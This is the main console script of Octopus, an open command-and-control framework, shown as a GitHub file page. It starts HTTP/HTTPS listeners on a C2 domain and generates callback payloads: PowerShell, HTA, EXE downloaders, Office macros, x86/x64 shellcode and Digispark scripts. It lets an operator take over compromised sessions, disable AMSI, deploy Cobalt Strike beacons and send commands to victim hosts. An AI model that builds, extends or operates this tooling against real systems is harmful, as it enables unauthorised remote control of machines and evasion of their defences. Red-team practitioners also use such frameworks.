-
-
Notifications
You must be signed in to change notification settings - Fork 155
/
octopus.py
executable file
·484 lines (409 loc) · 19.7 KB
/
octopus.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
#!/usr/bin/python3
import threading
import readline
import time
import base64
import sys
import os
import signal
from termcolor import colored
from core.functions import *
from core.weblistener import *
from flask import *
from profile import *
import logging
python_version = sys.version_info[0]
if python_version != 3:
print(colored("[-] Unable to run Octopus", "red"))
print(colored("[-] Please run Octopus with python 3", "red"))
sys.exit()
listeners=NewListener()
def ctrlc(sig, frame):
pass
signal.signal(signal.SIGINT, ctrlc)
if not os.path.isfile(".oct_history"):
open('.oct_history', 'a').close()
else:
readline.read_history_file(".oct_history")
banner()
while True:
readline.set_completer(completer)
readline.parse_and_bind("tab: complete")
readline.write_history_file(".oct_history")
try:
command = input("\033[4mOctopus\033[0m"+colored(" >>", "green"))
# readline.write_history_file(".console_history.oct")
if command == "list":
list_sessions()
if command == "history":
get_history()
if command == "help":
main_help_banner()
if command == "listeners":
list_listeners()
if command.split(" ")[0] == "delete":
try:
session = connections_information[int(command.split(" ")[1])]
delete(session[2], int(command.split(" ")[1]))
except:
print(colored("[-] Wrong session selected !", "red"))
continue
if command == "clear":
os.system("clear")
if command == "exit":
exit()
if command.split(" ")[0] == "generate_powershell":
try:
listener = command.split(" ")[1]
except IndexError:
print(colored("[-] Please select a listener !", "red"))
print(colored("Syntax : generate_powershell listener_name", "green"))
print(colored("Example : generate_powershell listener1", "yellow"))
continue
try:
hostname = listeners_information[listener][3]+":"+str(listeners_information[listener][2])
interval = listeners_information[listener][4]
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
generate(hostname, path, proto_to_use, interval)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
if command.split(" ")[0] == "delete_listener":
try:
try:
listener = command.split(" ")[1]
delete_listener(listener)
except IndexError:
print(colored("[-] Please select a listener !", "red"))
print(colored("Syntax : delete_listener listener_name", "green"))
print(colored("Example : delete_listener listener1", "yellow"))
except:
print(colored("[-] Wrong listener selected !", "red"))
continue
if command.split(" ")[0] == "generate_hta":
try:
listener = command.split(" ")[1]
except IndexError:
print(colored("[-] Please select a listener !", "red"))
print(colored("Syntax : generate_hta listener_name", "green"))
print(colored("Example : generate_hta listener1", "yellow"))
continue
try:
host_ip = listeners_information[listener][3]
bind_port=listeners_information[listener][2]
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
listeners.create_hta()
generate_hta(host_ip,bind_port,proto_to_use)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
if command.split(" ")[0] == "generate_unmanaged_exe":
try:
listener = command.split(" ")[1]
exe_path = command.split(" ")[2]
except IndexError:
print(colored("[-] Please select a listener and check your options !", "red"))
print(colored("Syntax : generate_unmanaged_exe listener_name output_path", "green"))
print(colored("Example : generate_unmanaged_exe listener1 /opt/Octopus/file.exe", "yellow"))
continue
try:
hostname = listeners_information[listener][3]+":"+str(listeners_information[listener][2])
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
generate_exe_powershell_downloader(hostname, path, proto_to_use, exe_path)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
#generate_unicorn_macro
if command.split(" ")[0] == "generate_unicorn_macro":
try:
listener = command.split(" ")[1]
vba_path = command.split(" ")[2]
except IndexError:
print(colored("[-] Please select a listener and check your options !", "red"))
print(colored("Syntax : generate_unicorn_macro listener_name output_path", "green"))
print(colored("Example : generate_unicorn_macro listener1 output_path", "yellow"))
continue
try:
hostname = listeners_information[listener][3]+":"+str(listeners_information[listener][2])
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
interval = listeners_information[listener][4]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
generate_unicorn_macro(hostname, path, interval, proto_to_use, vba_path)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
#generate_spoofed_args_exe
if command.split(" ")[0] == "generate_spoofed_args_exe":
try:
listener = command.split(" ")[1]
exe_path = command.split(" ")[2]
except IndexError:
print(colored("[-] Please select a listener and check your options !", "red"))
print(colored("Syntax : generate_spoofed_args_exe listener_name output_path", "green"))
print(colored("Example : generate_spoofed_args_exe listener1 /opt/Octopus/file.exe", "yellow"))
continue
try:
hostname = listeners_information[listener][3]+":"+str(listeners_information[listener][2])
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
generate_spoofed_args_exe(hostname, path, proto_to_use, exe_path)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
if command.split(" ")[0] == "generate_macro":
try:
listener = command.split(" ")[1]
exe_path = command.split(" ")[2]
except IndexError:
print(colored("[-] Please select a listener and check your options !", "red"))
print(colored("Syntax : generate_macro listener_name output_path", "green"))
print(colored("Example : generate_macro listener1 /opt/Octopus/file.macro", "yellow"))
continue
try:
hostname = listeners_information[listener][3]+":"+str(listeners_information[listener][2])
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
generate_macro(hostname, path, proto_to_use, exe_path)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
# shellcode
if command.split(" ")[0] == "generate_x86_shellcode":
try:
listener = command.split(" ")[1]
except IndexError:
print(colored("[-] Please select a listener and check your options !", "red"))
print(colored("Syntax : generate_x86_shellcode listener_name", "green"))
print(colored("Example : generate_x86_shellcode listener1", "yellow"))
continue
try:
hostname = listeners_information[listener][3]+":"+str(listeners_information[listener][2])
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
generate_x86_shellcode(hostname, path, proto_to_use)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
# shellcode x64
if command.split(" ")[0] == "generate_x64_shellcode":
try:
listener = command.split(" ")[1]
except IndexError:
print(colored("[-] Please select a listener and check your options !", "red"))
print(colored("Syntax : generate_x64_shellcode listener_name", "green"))
print(colored("Example : generate_x64_shellcode listener1", "yellow"))
continue
try:
hostname = listeners_information[listener][3]+":"+str(listeners_information[listener][2])
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
generate_x64_shellcode(hostname, path, proto_to_use)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
# generate_digispark
if command.split(" ")[0] == "generate_digispark":
try:
listener = command.split(" ")[1]
ino_path = command.split(" ")[2]
except IndexError:
print(colored("[-] Please select a listener and check your options !", "red"))
print(colored("Syntax : generate_digispark listener_name output_path", "green"))
print(colored("Example : generate_digispark listener1 /opt/Octopus/file.ino", "yellow"))
continue
try:
hostname = listeners_information[listener][3]+":"+str(listeners_information[listener][2])
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
generate_digispark(hostname, path, proto_to_use, ino_path)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
if command.split(" ")[0] == "interact":
readline.set_completer(completer_interact)
readline.parse_and_bind("tab: complete")
try:
session = connections_information[int(command.split(" ")[1])]
except:
print(colored("[-] Error interacting with host", "red"))
continue
while True:
try:
scommand = input("(%s) >> " % colored(session[2], "red"))
if scommand == "":
continue
elif scommand == "exit" or scommand == "back":
break
elif scommand == "help":
interact_help()
elif scommand == "clear":
os.system("clear")
elif scommand == "modules":
list_modules()
pass
elif scommand.split(" ")[0] == "load":
try:
module_name = scommand.split(" ")[1]
load_module(session[2], module_name)
pass
except IndexError:
print(colored("[+] Please select a module !"))
elif scommand.split(" ")[0] == "deploy_cobalt_beacon":
try:
beacon_path = scommand.split(" ")[1]
deploy_cobalt_beacon(session[2], beacon_path)
pass
except IndexError:
print(colored("[+] Please select a valid beacon path!", "red"))
elif scommand == "disable_amsi":
disable_amsi(session[2])
pass
else:
send_command(session[2], scommand)
except:
print(" ")
elif command.split(" ")[0] == "listen_http":
try:
# create new listeners for
ip = command.split(" ")[1]
try:
port = int(command.split(" ")[2])
except ValueError:
print(colored("[-] port should be number !", "red"))
continue
host = command.split(" ")[3]
try:
interval = int(command.split(" ")[4])
except ValueError:
print(colored("[-] interval should be number !", "red"))
continue
path = command.split(" ")[5]
listener_name = command.split(" ")[6]
if check_listener_name(listener_name):
if check_url(path):
listener = NewListener(
listener_name,
ip,
port,
host,
interval,
path
)
if check_listener_port(ip, port):
listener.start_listener()
listener.create_path()
listeners=listener
print(colored("[+]%s Listener has been created" % listener_name, "green"))
#else:
# print(colored("[-] Cannot use the same hostname for multiple urls", "red"))
#in order to make it global so we can use in other functions
else:
print(colored("[+] Port in use or you don't have permession to bind", "red"))
else:
print(colored("[-] URL name already used, please change it", "red"))
else:
print(colored("[-] Listener name already used, please change it", "red"))
except IndexError:
print(colored("[-] Please check listener arguments !", "red"))
print(colored("Syntax : listen_http BindIP BindPort hostname interval URL listener_name", "green"))
print(colored("Example (with domain) : listen_http 0.0.0.0 8080 myc2.live 5 comments.php op1_listener", "yellow"))
print(colored("Example (without domain) : listen_http 0.0.0.0 8080 172.0.1.3 5 profile.php op1_listener", "yellow"))
http_help_banner()
continue
elif command.split(" ")[0] == "listen_https":
try:
# create new listeners for
ip = command.split(" ")[1]
try:
port = int(command.split(" ")[2])
except ValueError:
print(colored("[-] port should be number !", "red"))
continue
host = command.split(" ")[3]
try:
interval = int(command.split(" ")[4])
except ValueError:
print(colored("[-] interval should be number !", "red"))
continue
path = command.split(" ")[5]
listener_name = command.split(" ")[6]
if check_listener_name(listener_name):
key_path = command.split(" ")[7]
cert_path = command.split(" ")[8]
if not os.path.isfile(cert_path) or not os.path.isfile(key_path):
print(colored("[-] Please check the certficate and key path", "red"))
else:
listener = NewListener(
listener_name,
ip,
port,
host,
interval,
path,
cert_path,
key_path
)
if check_listener_port(ip, port):
listener.start_listener()
listener.create_path()
listeners=listener
print(colored("[+]%s Listener has been created" % listener_name, "green"))
else:
print(colored("[+] Port in use or you don't have permession to bind", "red"))
else:
print(colored("[-] Listener name already used, please change it", "red"))
except IndexError:
print(colored("[-] Please check listener arguments !", "red"))
print(colored("Syntax : listen_https BindIP BindPort hostname interval URL listener_name certficate_path key_path", "green"))
print(colored("Example (with domain) : listen_https 0.0.0.0 443 myc2.live 5 login.php op1_listener certs/cert.pem certs/key.pem", "yellow"))
continue
except EOFError:
print(" ")